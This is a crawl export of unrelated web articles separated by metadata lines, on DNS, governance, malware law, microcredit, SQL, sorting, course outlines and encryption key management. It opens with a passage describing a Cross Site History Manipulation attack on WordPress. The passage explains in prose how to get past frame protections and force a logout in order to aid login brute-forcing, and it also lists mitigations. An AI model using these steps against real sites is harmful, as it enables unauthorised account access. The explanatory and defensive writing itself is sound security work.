This might be a counter measure for the XSHM attack, and in fact the attack will fail. So how can the attacker change the history.length without an iframe on the current page? Using Window.Opener in the XSHM Attack - Open a child window from his page, for example attacker.com/opener.html -> attacker.com/child.html - In the child window the attacker uses the opener.history.length to retrieve the history length from attacker.com/opener.html - Set the location of the opened window to http://192.168.1.123/wordpress/wp-admin/ using opener.location - Set window.opener.location to http://192.168.1.123/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.123%2Fwordpress%2Fwp-admin%2F&reauth=1 - Set opener.location back to attacker.com/opener.html to be on the same origin again. Now the attacker should be able to get the value of opener.history.length again and compare it to the one from step 2. This way the attacker can also bypass the X-Frame-Options protection against XSHM. This could also be stealthily done by using a popunder window. The Maximum Value of the history.length Property Another problem that might hinder these type of attacks is the maximum value of the history.length property. For example on Chrome its highest value can be 50. If the value needs to be increased and it is already at 50, the first (oldest) entry is removed and the last entry is added. This can be a problem when doing a Cross Site History Manipulation attack, but as a workaround the attacker can: - Trick the victim into visiting a url from the same origin with window.opener.location. - Then trick the victim again to navigate back to the first page he visited in the current session with window.opener.history.go(- (window.opener.history.length-1)). This first retrieves the amount of pages the user can go back and then goes back to the first page. - Set the URL to a new link. The history value is 2 now. This way the attacker bypasses the problem of the 50 entries limit. Dealing with Logout CSRF Protection Another hurdle for the XSHM attack is the logout CSRF protection. If the user is logged in the attacker usually can’t reliably check whether or not there is an actual WordPress installation on the server, so he can’t brute force the login page with a user that is already logged in. Well WordPress is a little special in this case. When the victim visits wp-login.php he is greeted with a login prompt whether or not he is logged in. This would solve the problem the attacker would have with bruteforcing credentials, however it is still not possible to reliably check with wp-login / wp-admin if there is a WordPress installation on the web server. But WordPress has an additional parameter you can set to actually log you out when you visit wp-login. It is called reauth. When it is set to 1 you are automatically logged out, which means the attacker can try to point the victim to wp-admin and see if it redirects him to wp-login again. How can You mitigate against the XSHM Attack? As a WordPress user you can’t take any precautions to prevent XSHM attacks, since this is a browser feature you can’t control. You can only rely on the developers of the respective website to take all the necessary precautions that prevent XSHM attacks. These include: - Avoiding conditional redirects that can leak sensitive information. - Using of CSRF Tokens. It can also be a good idea to add random characters to the URL. 
These don’t have to be connected to any application level logic, like CSRF tokens do, but can make it difficult for an attacker to guess the exact link where the victim will be redirected to. Note: While there is a proof of concept for this WordPress attack it is unlikely to be used in a real life scenario because of the knowledge that is required about the target and because of the long time the victim has to spend on the attacker’s page, while having a refreshing window in plain sight.
Anyone who uses the Internet to send an E-mail or browse the Web uses the Domain Name System (DNS) without even realizing it. DNS is an incredibly important, but completely hidden, part of the Internet. The DNS forms one of the largest and most active distributed databases on the planet. Without DNS, the Internet would grind to a halt very quickly. When you use the Web or send an E-mail message, you use a domain name to do it. For example, the URL http://www.bicycleshop.com contains the domain name bicycleshop.com. So does the e-mail address sales@ bicycleshop.com. Human-readable names like bicycleshop.com, though easy for people to remember, do not provide the necessary IP address information the machines use to communicate with each other. The DNS allows you to connect to another networked computer or remote service by using its user-friendly domain name rather than its numerical IP address. Every time you use a domain name, you use the Internet’s DNS to translate the human-readable domain name into the machine-readable IP address. During a day of browsing and e-mailing, you might access these servers hundreds of times! As a CCNA or CCNP, it is vital that you be able to install, configure, maintain, and troubleshoot the various operational areas of the DNS system, both locally and, possibly, on a world-wide level. In this post, we’ll take a look at the DNS in more detail so you can understand how it works and appreciate its amazing capabilities. As we have been discussing, DNS translates domain names to IP addresses. This process sounds like a relatively simple task. And it would be, except for five factors: - There are currently billions of IP addresses in use. And, most machines have a human-readable name as well. - There are many billions of DNS requests made every day. A single user can easily make a hundred or more DNS requests a day. Compounding that fact, there are hundreds of millions of people and machines using the Internet daily. - Domain names and IP addresses change daily. - New domain names get created daily. - Millions of people do the work to change and add domain names and IP addresses every day. The DNS is basically a database, and no other database on the planet gets this many requests. Additionally, no other functional database currently in use has millions of people changing it every day. These factors are what make the DNS so unique. There are some additional factors that impact the DNS process that must be considered. Remember that every device that has a presence on the Internet must have its own unique IP address. Some of the basic rules of IP address assignment dictate that a server usually has a static IP address that does not change very often. On the other hand, a home machine that is connecting through a modem often has an IP address that is dynamically assigned by the Internet Service Provider (ISP) when you log in. That IP address is unique for your session and may be different the next time you log in. In this way, an ISP only needs one IP address for each modem it supports, rather than for every customer. It should be noted that as far as the machines on the Internet are concerned, an IP address is all that you need to connect to a server. For example, you can type http://184.108.40.206 in your browser and you will arrive at a machine that contains a Web site such as Bicycleheaven.Com. Domain names are strictly a human convenience. To serve requests for resolution, DNS uses the User Datagram Protocol (UDP) header at Layer 4 of the OSI model. 
In addition, DNS operates on well-known port 53. DNS queries consist of a single UDP request from the client followed by a single UDP reply from the server. The Transmission Control Protocol (TCP) is used when the response data size exceeds 512 bytes, or for tasks such as zone transfers. In addition, some operating systems, such as HP-UX, are known to have resolver implementations that use TCP for all queries, even when UDP would suffice. In my next post, we will examine some of the more technical aspects of the DNS process.

Author: David Stahl
The principles of corporate governance are a collection of non-binding values that have been drafted to provide useful guidance to a business in terms of their business activities and association with their stakeholders. Following these principles will help a firm improve itself in terms of following the legal rules and regulations of business activities and turning itself into a more ethical firm. The key corporate governance principles are described below. This is the most basic and initial step that companies should take. Board of directors and company officials should build a proper corporate governance structure and delegate duties and authorities to everyone till the last level of the hierarchy. Ensure that all the employees in the organization understand their duties and the amount of flexibility and decision-making power that has been allotted to them. This will make it easier to monitor employees and their progress as well as identify employees who are not fulfilling their responsibilities. This implies that shareholders belonging to the same class will receive equal treatment. They will be given all the rights that they have been promised. Some of the fundamental rights of shareholders include voting in shareholder meetings, receiving information and feedback about necessary changes required for the firm, transferring shares, obtaining relevant business material regularly and election or exclusion of board members. Stakeholders focus on the development of employees and keep an eye on the company with regard to their compliance of established regulations. They are responsible for reporting any unethical actions that take place in the firm or any concerns regarding it. Moreover, stakeholders alert creditors and shareholders of the company in case the company is at a risk of insolvency or if the firm is unable to pay their dues on time. This will ensure that the company is complying with all rules and regulations and is not indulging in unethical business practices. As a result of this, employee performance and productivity will also increase as employees will be aware of working in an ethical environment. To implement good corporate governance in the firm, it needs to adhere to the full disclosure principle which necessitates the company to disclose or publicly reveal all ownership and shareholder rights, company’s financial statements, the business objectives of the company and the amount of salary paid to the key executives of the company. The company is also obligated to reveal its corporate governance policies, accounting procedures and risk factors relevant to the company’s business activities. Mostly, such information is mentioned in the annual reports of firms. Companies that are more transparent and follow the best practice principles of good corporate governance are usually liked by shareholders and customers. Customers prefer buying products or services of an ethical company as they are aware of its importance. Employees too, like working in such companies as they know that they will be given their appropriate rights and that their health and safety will be taken care of in the workplace environment.
The Internet allows an individual to either inadvertently or purposely disseminate malware (such as a virus) to other systems globally. The potential impact could encompass the “infection” or compromise of millions of hosts. This has occurred. A “harmless experiment” by Cornell University student Robert Morris involved the release onto the Internet of a type of malware called a “worm” that compromised over 6,000 computers and required millions of dollars worth of time to eradicate. As several “non-public computers” run by the US Government were damaged , Morris was prosecuted under the US Computer Fraud and Abuse Act (CFAA). He was convicted notwithstanding his declaration that he had no malicious objective to cause damage. It is probable a service provider or content hosting entity will face a degree of liability dependent on intention. If malware is intentionally posted such as in the Morris’ case, no uncertainty as to whether the conception and insertion of the malware was deliberate exists. Morris stated he did not intend harm, but the fact remained that he intentionally created and released the worm. In the United States both Federal and State legislation has been introduced to deal with the intentional formation and release of malware. In the UK, the introduction of malware is covered by section 3 of the Computer Misuse Act . The Act states that a crime is committed if a person “does any act which causes an unauthorized modification of the contents of any computer” and the perpetrator intends to “cause a modification of the contents of any computer” which may “impair the operation of any computer”, “prevent or hinder access to any program or data held in any computer” or “impair the operation of any such program or the reliability of any such data”. The deliberate introduction of any malware will meet any of these requirements by taking memory and processing from the system and feasibly damaging the system. It is also necessary for a successful prosecution to demonstrate a “requisite knowledge”. This “is knowledge that any modification he intends to cause is unauthorized”. With the volume of press coverage concerning the damage that can be caused by malware and the requirements for authorization, it is highly unlikely an accused party would be able to successfully argue ignorance as to authorization. Malware is generally distributed unintentionally subsequent to its initial creation. Thus an ICP or an ISP would not be found criminally liable under either the Computer Fraud and Abuse Act or the Computer Misuse Act for most cases of dissemination. For the majority of content providers on the Internet, there exists no contractual agreement with users browsing the majority of sites without any prospect of consideration. The consequence being that the only civil action that could succeed for the majority of Internet users would be a claim brought on negligence. Such a claim would have to overcome a number of difficulties even against the primary party who posted the malware let alone going after the ISP. It would be necessary to demonstrate the ISP is under a duty of care. The level of care that the provider would be expected to adhere to would be dependent on a number of factors and a matter for the courts to decide and could vary on the commerciality of the provider and the services provided. 
The standard of due care could lie between a superficial inspection through to a requirement that all software is validated using up-to-date anti-virus software on regular intervals with the court deciding dependant on the facts of the initial case that comes before the courts. The duty of care is likely to be most stringently held in cases where there is a requirement for the site to maintain a minimum standard of care, such as in the case of a payment provider that processes credit cards. Such a provider is contractually required to adhere to the PCI-DSS as maintained by the major credit card companies and would consequently have a greater hurdle in demonstrating that they were not negligent in not maintaining an active anti-virus program. Loss of an entirely economic nature cannot be recovered through an action for negligence under UK law. There is a requirement that some kind of “physical” damage has occurred. The CIH or Chernobyl virus was known to overwrite hard-drive sectors or BIOS. This could in some cases render the motherboard of the host corrupt and unusable. In this instance the resultant damage is clearly physical; however, as in the majority of Internet worms , most impact is economic in effect. Further, it remains undecided as to whether damage to software or records and even the subsequent recovery would be deemed as a purely economic loss by the courts. It may be possible to initiate a claim using the Consumer Protection Act in the UK and the directives enforced within the EU . The advantage to this approach is the act does not base liability on fault. It relies on causation instead of negligence in determining the principal measure of liability. The act rather imposes liability on the “producer” of a “product”. A “producer” under the act includes the classification of importer, but this definition would only be likely to extend to the person responsible for the contaminated software such as the producer or programmer. It also remains arguable as to whether software transmitted electronically forms a “product” as defined under the act. Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030; There is an obligation for prosecution under the CFAA that a non-public computer is damaged where the term “damage” means any impairment to the integrity or availability of data, a program, a system, or information. Computer Misuse Act 1990 (c. 18), 1990 CHAPTER 18 The PCI-DSS at section 5 requires that “Anti-virus software must be used on all systems commonly affected by viruses to protect systems from malicious software.” Scandariato, R.; Knight, J.C. (2004) “The design and evaluation of a defence system for Internet worms” Proceedings of the 23rd IEEE International Symposium on Reliable Distributed Systems, 2004. Volume, Issue, 18-20 Oct. 2004 Page(s): 164 - 173 The Consumer Protection Act 1987 (Product Liability) (Modification) Order 2000 (Statutory Instrument 2000 No. 2771) See also, Electronic Commerce (EC Directive) Regulations 2002, SI 2000/2013 and the provisions of the Product Liability Directive (85/374/EEC) About the Author: Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. 
He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.
Who would have thought that a bank -- that capitalist economic icon -- and the poorest residents of the world's most impoverished country could create an idea that changed the world? And yet this is the story of microcredit -- a concept that began in Bangladesh and spread across the globe. While businesspeople may tend to ignore grand ideas for world peace, an end to poverty or discrimination, they are often scorned as purely "profit-motivated," looking out for their own interests and disinterested in society's larger issues. While there's nothing wrong with pursuing profit or articulating large-scale goals for social betterment, neither mode can create significant societal change. Luckily our world has a few individuals who combine care of their fellows with a tough, business-minded drive to get things done. Mohammad Yunus -- the Nobel Peace Prize winner in 2006 -- is one such person. Yunus started Grameen Bank in Bangladesh in 1976 with $27 of his own money. Specializing in small, unsecured business loans to the poor, the bank has loaned $5.95 billion to 12 million borrowers. These unsecured loans -- with no punishment for default -- have been repaid at a 99 percent recovery rate, and 59 percent of borrowers have risen above the poverty line in their areas. The bank also has been profitable almost every year since 1983 and has used those profits to give scholarships to more than 34,000 children, and fund housing and college loans, life insurance, pensions and other programs. And 89,000 beggars have participated in a Grameen-run job program. The bank is now primarily owned by its borrowers -- mostly women -- and the microcredit concept spread worldwide, helping an estimated 80 million of the world's 1 billion people who live on less than $1 per day. From Yunus' genius comes bright ideas such as the Village Phone. A small loan allows someone to buy a cell phone in a region with no wired telecommunications service. The village phone owner charges others a small fee to make phone calls; the owner repays the loan and makes a profit. The village for the first time has telecommunications service, and other businesses spring up around that new technology. By the late 1990s, 60,000 "telephone ladies" were providing telecommunications services in 80 percent of Bangladesh's villages. In addition to the phone program, Grameen has also funded fish farms, knitwear factories and other traditional enterprises. While Yunus hasn't yet -- as he says -- "put poverty in a museum," he has a plan and it's working. And the microcredit concept has broader implications for governments, the private sector and nongovernmental organizations. None alone can obliterate all of society's problems, but with an entrepreneurial spirit like Yunus', something can be done. In his article, Social Business Entrepreneurs Are the Solution, Yunus says when things go wrong, it is often not "market failure" but "conceptualization failure." "When we presented the Village Phone Project to the professional people," said Yunus in a 1998 speech, "they expressed serious doubt about the capacity of the illiterate women to understand this state-of-the-art telecommunication technology. They argued that the poor women are good only for handling traditional activities, such as raising chicken and cow, making baskets, selling vegetables. 'It is ridiculous to think about telecommunication business for people who have never seen a telephone, or even electricity.'" But Yunus had no conceptualization failure. 
"We remained thoroughly convinced that while people may be poor and illiterate, they are not stupid. Potentially they are as smart as anybody else in the world." That bodes well for the developing world, and also for the public sector as it learns to govern using a digital platform. As the telephone ladies bring infrastructure to the remotest villages, governments -- and their partners -- have more options to deliver services electronically. And the more people government can serve, the more chances exist for citizens to receive critical services, such as education and health care. Yunus saw potential where others saw only poverty, and invested in it. As a result, millions worldwide have begun to climb the economic ladder.
<urn:uuid:3af4e838-deb2-4cc8-99c8-081c9e2bce61>
CC-MAIN-2017-04
http://www.govtech.com/magazines/pcio/Can-We-Put-Poverty-in-a.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00204-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965802
860
2.734375
3
In this course you will learn about the benefits, the architecture, the requirements and limitations of vSphere Data Protection. We will cover the deployment and configuration of vSphere Data Protection. This is followed by demonstration of the creation of backup jobs, backup data replication and application backup configurations. You will then learn about restoring virtual machines, performing File Level Restore and how to perform vSphere Data Protection Emergency Restore. Next, you’ll learn about the benefits and the architecture of vSphere Replication. We will also cover the deployment and configuration of the vSphere Replication Appliance, as well as the setting of a Disaster Recovery site to act as a vSphere Replication target. Finally, you will learn how to configure replications and how to recover virtual machines.
<urn:uuid:8e059da2-87c1-45b1-b8e8-9a4d8c1a9a2e>
CC-MAIN-2017-04
https://streaming.ine.com/c/ine-vsphere6-data-protection-replication
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00112-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923696
153
2.609375
3
The IT industry is losing out on new talent because schools and universities are not providing the information that students need to make informed career choices, a survey has found. In a survey of 1,056 students at higher education institutions across the UK, CompTIA, the IT trade association, found that just 13% felt that their institution had fully equipped them to make career decisions. Although nearly a fifth (18%) of students said they were interested in working in IT or technology, and 23% said they might be interested if they knew more about the careers, 41% did not feel they were well-informed about the range of careers open to them. "There is plenty of potential interest, but the lack of information means a huge number of technology jobs remain unfilled and motivated graduates remain unemployed unnecessarily," said John McGlinchey, VP of Europe and Middle East sales operations at CompTIA. The association also predicted that employment in the IT industry would grow at 2.19% a year over the next decade, which translates into more than half a million new IT and telecoms professionals needed over the next five years. CompTIA's survey found that 36% of students assume they need an IT or related degree to work in the industry. While this is true for certain areas, such as programming, the association said that industry training and certifications have proven to be successful entry routes into many other areas of IT for graduates without a technology degree. Other misconceptions students had about IT included the belief that the job involved sitting in a back room with little or no social contact. Kevin Streater, executive director for IT Intelligence at the Open University, said: "For far too long there has been a false assumption that IT is too technical for most people to get into. The reality is that anyone who is educated, motivated and passionate about technology should consider a career in the industry. At its core, it is very much a career where you can keep learning, keep developing and keep your hands on technology." This story, "Lack of career information means IT industry loses out, says CompTIA", was originally published by Computerworld UK.
<urn:uuid:ce9fb75c-083d-4da3-acc0-41ae945adf42>
CC-MAIN-2017-04
http://www.itworld.com/article/2732234/it-management/lack-of-career-information-means-it-industry-loses-out--says-comptia.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00022-ip-10-171-10-70.ec2.internal.warc.gz
en
0.977882
446
2.578125
3
Use SQL to Remove Extra Spaces
October 11, 2006
Ted Holt

The SQL sorting tip you published on September 13 was a good one. I had seen a similar tip written by Craig Mullins in Quest Software's Pipeline Newsletter. Mullins had two other interesting tips on the same page. I thought your readers might like to see them as well.
--Tom

The Web page to which Tom refers is at http://www.quest-pipelines.com/newsletter-v7/0606_F.htm. Craig Mullins uses the technique about which I wrote to sort data on three-letter day abbreviations. Another tip he presents involves using the REPLACE function to remove extra spaces within a character string. IBM added the REPLACE function to SQL in V5R3. I ran the following query to see what would happen, and it worked like a charm.

select name,
       replace(replace(replace(name, ' ', '<>'), '><', ''), '<>', ' ')
  from qtemp/mydata

Here's what I saw (the NAME column contains varying runs of blanks between the two words; the derived column shows the cleaned-up result):

NAME            REPLACE
Joe Smith       Joe Smith
Joe  Smith      Joe Smith
Joe   Smith     Joe Smith
Joe    Smith    Joe Smith
Joe     Smith   Joe Smith
Joe      Smith  Joe Smith

So how does it work? The innermost REPLACE changes all blanks to a less-than greater-than pair. So, if there are three spaces between Joe and Smith, the innermost REPLACE returns Joe<><><>Smith. The middle REPLACE changes all greater-than less-than pairs to the empty string, which removes them; Joe<><><>Smith becomes Joe<>Smith. The outer REPLACE changes all less-than greater-than pairs to a single blank; Joe<>Smith becomes Joe Smith. Clever!

You do not have to use the less-than and greater-than symbols. Any two characters that are not used in the field will work. As for the other technique, I did not quite catch Craig Mullins' drift, but maybe it was the example he gave.
<urn:uuid:b8df3a6e-e586-423d-a510-2c299865f45c>
CC-MAIN-2017-04
https://www.itjungle.com/2006/10/11/fhg101106-story02/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00416-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918816
418
2.65625
3
multikey Quicksort

Definition: Pick an element from the array (the pivot). Consider the first character (key) of the string (multikey). Partition the remaining elements into three sets: those whose corresponding character is less than, equal to, and greater than the pivot's character. Recursively sort the "less than" and "greater than" partitions on the same character. Recursively sort the "equal to" partition by the next character (key).

Also known as three-way radix quicksort.

Generalization (I am a kind of ...)
Aggregate child (... is a part of or used in me.) Dutch national flag, key.
See also postman's sort, quicksort, ternary search tree.

Note: Especially good for strings. The paper "Fast Algorithms for Sorting and Searching Strings" gives a good 3-way partition algorithm.

Jon L. Bentley and Robert Sedgewick, "Fast Algorithms for Sorting and Searching Strings", Proc. 8th Annual ACM-SIAM Symposium on Discrete Algorithms (SODA), pages 360-369, January 1997.

Paul E. Black, "multikey Quicksort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds., 30 December 2005. Available from: http://www.nist.gov/dads/HTML/multikeyQuicksort.html
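The definition above translates almost line-for-line into code. The following is a minimal, self-contained C sketch of three-way radix quicksort over an array of C strings; it is written from the definition rather than copied from the Bentley-Sedgewick paper cited above, so the function and variable names are illustrative only.

#include <stdio.h>

/* Swap two string pointers in the array. */
static void swap(const char *a[], int i, int j) {
    const char *t = a[i]; a[i] = a[j]; a[j] = t;
}

/* Sort a[lo..hi], which all share a common prefix of length d,
 * by the character at position d (three-way radix quicksort). */
static void mkqsort(const char *a[], int lo, int hi, int d) {
    if (lo >= hi) return;
    int lt = lo, gt = hi, i = lo + 1;
    int pivot = (unsigned char)a[lo][d];        /* pivot character */
    while (i <= gt) {
        int c = (unsigned char)a[i][d];
        if (c < pivot)      swap(a, lt++, i++); /* "less than" set    */
        else if (c > pivot) swap(a, i, gt--);   /* "greater than" set */
        else                i++;                /* "equal to" set     */
    }
    /* Now a[lo..lt-1] < pivot, a[lt..gt] == pivot, a[gt+1..hi] > pivot. */
    mkqsort(a, lo, lt - 1, d);                  /* same character */
    if (pivot != '\0')
        mkqsort(a, lt, gt, d + 1);              /* next character */
    mkqsort(a, gt + 1, hi, d);                  /* same character */
}

int main(void) {
    const char *words[] = { "banana", "band", "bandana", "apple", "bandit", "ape" };
    int n = (int)(sizeof words / sizeof words[0]);
    mkqsort(words, 0, n - 1, 0);
    for (int i = 0; i < n; i++)
        puts(words[i]);     /* prints: ape apple banana band bandana bandit */
    return 0;
}

The three-set partition step is the Dutch national flag problem listed as an aggregate child above; the recursion on the "equal to" partition advances to the next character only while the shared character is not the terminating '\0', since at that point all strings in the partition are identical.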
<urn:uuid:e605dc95-cf5b-4a51-8b11-7de7e98ac110>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/multikeyQuicksort.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00324-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833246
356
2.9375
3
I130 Introduction to Cybersecurity
An overview of Introduction to Cybersecurity. Professor Jean Camp

Introduction to Cybersecurity is designed to provide undergraduate students with a 10,000 ft overview of cybersecurity both as a concept and as an area of study. The course will provide an opportunity to hear not only from the faculty but also from the professionals who protect the Indiana University network. Participation does not require understanding more than the lecture, as there are no technical requirements for taking the course. The course is ideal for students who are enrolled in Informatics or Computer Science, but it is also extremely accessible to those who are simply curious about the risks they face on the network. The material will be targeted at a level appropriate for freshmen, and clarifying questions are more than welcome.

Course requirements:
class participation -- in-class and OnCourse participation are both counted
weekly commentary -- due every week

In terms of participation, contributions both in the classroom and in the discussion area on OnCourse are considered. If you are more comfortable speaking than writing, or more comfortable in writing than speaking, you may choose only one. Participation should illustrate that any assigned reading has been completed. Participation that is not professional in manner will not be counted as a positive contribution. In terms of the weekly writing, each week there is a 150-word commentary on the lecture. The commentary may be a summary or a comment, or you may ask a question, or you may connect the lecture to some current event. The commentary must illustrate awareness (to be passable) and understanding (to be excellent) of the lecture materials.

This course introduces students to security. It will focus primarily on three core areas (technical aspects of security, organizational aspects of security, and legal aspects of security). Through examples of security problems in real life, this course will illuminate fundamental ideas and concepts of information security.

October 25: The Course in a Nutshell. Professor Jean Camp. Introduction to the basic concepts of security. Introduction to the faculty, grading and class organization.
November 1: Your Privacy and Security. Bob Konicek, Network Administrator. As you use the computers and networks in Informatics, what does the school learn about you? Does this align with your expectations?
November 8: Security Protocols. Markus Jakobsson, Associate Professor, Informatics and Computer Science. Protocols define the syntax and semantics of communication between devices. That is, security protocols can be seen as games: understanding security means understanding the rules, and breaking security allows you to cheat.
November 15: Security in Practice. Mark Bruhn, Chief IT Security and Policy Officer, IU. Security in theory is different from security in practice. What does it mean to secure a network? How do network managers view security, and what are the real-world threats likely to be faced by security managers?
November 22: Thanksgiving Day recess.
November 29: Malware on the Network. Raquel Hill, Assistant Professor, Informatics and Computer Science. Connectivity is exposure. Network risks include denial of service, masquerade attacks, and direct hacking assaults. This session will focus on understanding the threats created on and in the network.
December 6: Malware in Peer-to-Peer Networks. Minaxi Gupta, Assistant Professor of Computer Science. Security is based on concepts of transactions, log-in and specified roles. P2P can violate all those assumptions. What risks are you taking when you download your music?
<urn:uuid:ae8adf75-3c34-478f-8722-b1529ca72d1a>
CC-MAIN-2017-04
http://www.ljean.com/classes/06_07/I130/Prospectus_130.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00534-ip-10-171-10-70.ec2.internal.warc.gz
en
0.920481
712
2.71875
3
Data encryption and key management in the real world Best practices dictate that we must protect sensitive data at the point of capture, as it’s transferred over the network (including internal networks) and when it is at rest. Protecting data only sometimes – such as sending sensitive information over wireless devices over the Internet or within your corporate network as clear text – defeats the point of encrypting information in the database. It’s far too easy for information to be intercepted in its travels so the sooner the encryption of data occurs, the more secure the environment will be. A comprehensive encryption solution doesn’t complicate authorized access to the protected information – decryption of the data can occur at any point throughout the data flow wherever there is a need for access. Decryption can usually be done in an application-transparent way with minimum impact to the operational environment. Due to distributed business logic in application and database environments, organizations must be able to encrypt and decrypt data at different points in the network and at different system layers, including the database layer. Encryption performed by the database management system can protect data at rest, but more security oriented corporations will also require protection for data while it’s moving between applications, databases and data stores. One option for accomplishing this protection is to selectively parse data after the secure communication is terminated and encrypt sensitive data elements at a very granular level (usernames, passwords, etc.). Application-layer encryption and mature database-layer encryption solutions allow enterprises to selectively encrypt granular data into a format that can easily be passed between applications and databases without changing the data. Key management is often overlooked One of the essential components of encryption that is often overlooked is key management – the way cryptographic keys are generated and managed throughout their life. Since cryptography is based on keys which encrypt and decrypt data, your database protection solution is only as good as the protection of those keys. Security depends on several factors including where the keys are stored and who has access to them. When evaluating a data privacy solution, it is essential to include the ability to securely generate and manage keys. This can be achieved by centralizing all key management tasks on a single platform, and effectively automating administrative key management tasks, providing both operational efficiency and reduced management costs. Data privacy solutions should also include an automated and secure mechanism for key rotation, replication, and backup. The difficulty of key distribution, storage, and disposal has limited the wide-scale usability of many cryptographic products in the past. Automated key distribution is challenging because it is difficult to keep the keys secure while they are distributed, but this approach is finally becoming secure and more widely used. Standards for key-management have been developed by the government and by organizations such as ISO, ANSI, and the American Banking Organization (ABA). The key management process should be based on a policy. This article will exemplify different elements of a suggested policy for a Key Management System used for managing the encryption keys that protect secret and confidential data in an organization. 
Issues with native point solutions A major problem with encryption as a security method is that the distribution, storage, and eventual disposal of keys introduce an expensive and onerous administrative burden. Historically, cryptographic keys were delivered by escorted couriers carrying keys or key books in secure boxes. An organization must follow strictly enforced procedures for protecting and monitoring the use of the key, and there must be a way to change keys. Even with all of these restrictions, there is always a chance that the key will be compromised or stolen. Even if there are standards developed for key-management it is still the most difficult part of an encryption solution. This is one of the greater challenges to overcome when you decide to create your own solution based on encryption toolkits from database vendors and security vendors. These toolkits provide the basic functionality for encrypting and decrypting information but typically do not provide a secure key-management system. Many companies have tried to develop their own encryption functionality, but few have succeeded in creating a system that performs not only by doing the obvious encryption, but doing so in a secure and reliable manner that does not prohibit you from keeping your systems operational. A mature data protection system should be based on a sophisticated key management system that is transparent, automated, secure and reliable for the environments where it operates. A distributed approach with a central point of control A mature data protection system should provide a central point of control for data protection systems at the application, database and file levels. The encryption solution has a combined hardware and software key management architecture which combine the benefits of each technology. This will address the central security requirements while providing the flexibility to allow security professionals to deploy encryption at the appropriate place in their infrastructure. It provides advanced security and usability smooth and efficient implementation into today’s complex data storage infrastructures. If your human resources department locks employee records in filing cabinets where one person is ultimately responsible for the keys, shouldn’t similar precautions be taken to protect this same information in its electronic format? One easy solution is to store the keys in a restricted database table or file. But, all administrators with privileged access could also access these keys, decrypt any data within your system, and then cover their tracks. Your database security in such a situation is based not on industry best practice, but on trusting your employees. When securing the sensitive data within your organization trust is not a policy. The key custodian should be a role in the IT organization. The key custodian The key custodian is responsible for managing the multi-layer key management infrastructure, including the creation of keys, distribution of replacement keys and the deletion of keys that have been compromised. The custodian should be appointed by the Compliance Review Committee. Access to central key management functions should require a separate and optional strong authentication and management of encryption keys should be logged in an evidence-quality audit system. Keys stored in the Hardware Security Module are protected from physical attacks and cannot be compromised even by stealing the Hardware Security Module itself. 
Any attempt to tamper with or probe the Hardware Security Module will result in the immediate destruction of all private key data, making it virtually impossible for either external or internal hackers to access this vital information. Encryption of the application data should be performed by an Enforcement Agent that should be implemented as a Dedicated Encryption Service (Please see my article in (IN)SECURE Issue 8) that is separated from the administration of the data that it protects. This service may run in different environments including in a separate process, a separate server or in a Hardware Security Module depending on the security class of the data and the operational requirements for performance and availability. Key domains for protection and easier management A mature data encryption solution should support the concept of key domains which can isolate different systems for security reasons or operational needs. Each key domain may have different security exposures and can have a different policy for how keys should be managed including key generation, key rotation and protection of key material. It should support transparent re-encryption of the data when it flows between systems that are using different encryption keys or different algorithms. The Key Management System must support multiple levels of keys to ensure that the encryption keys that protect secret and confidential data cannot be compromised. This enables the use of different encryption keys for different columns, tables and files. When setting policy, it is important to configure the use of different encryption keys and initialization vectors across different columns, tables and files to maintain compartmentalization and a diverse front against attack. The Keys should be stored in an Enforcement Agent that supports dual control (requiring more than a single administrator/operator) for key recovery. It may be implemented in hardware or software, but it must support both the encryption and integrity of the key backup format. Annual review of algorithms and key lengths The Key Management System must support key length or strength of 128-bits or greater for symmetric keys. Such keys are deemed “strong encryption” and are not susceptible to a brute force attack using current technology. Public or asymmetric keys must be of equivalent strength. That is, a 128-bit symmetric key and 3072-bit public key are considered to be equivalent in terms of strength, while a 15,360-bit public key is equivalent to a 256-bit symmetric key. The data encryption should be performed with strong standard algorithms including 3DES, AES 128 or AES 256. Data requiring protection for longer periods of time should use the longer key lengths. Note that adequate CPU power today may not be enough tomorrow as you incorporate more secure communications. It is wise to establish a key-length policy early and review it annually. Secure generation and distribution of keys The Key Management System must generate a unique key for each file, tape, or other data element that needs to be encrypted. Private keys must be generated within the secure confines of the Key Management System and never be transferred outside the Key Management System unless encrypted with a Key Encryption Key. All keys should be centrally generated in software or hardware based on the security class for the type of data they protect. The key management system must be able to electronically transfer private keys to other trusted key repositories throughout the enterprise. 
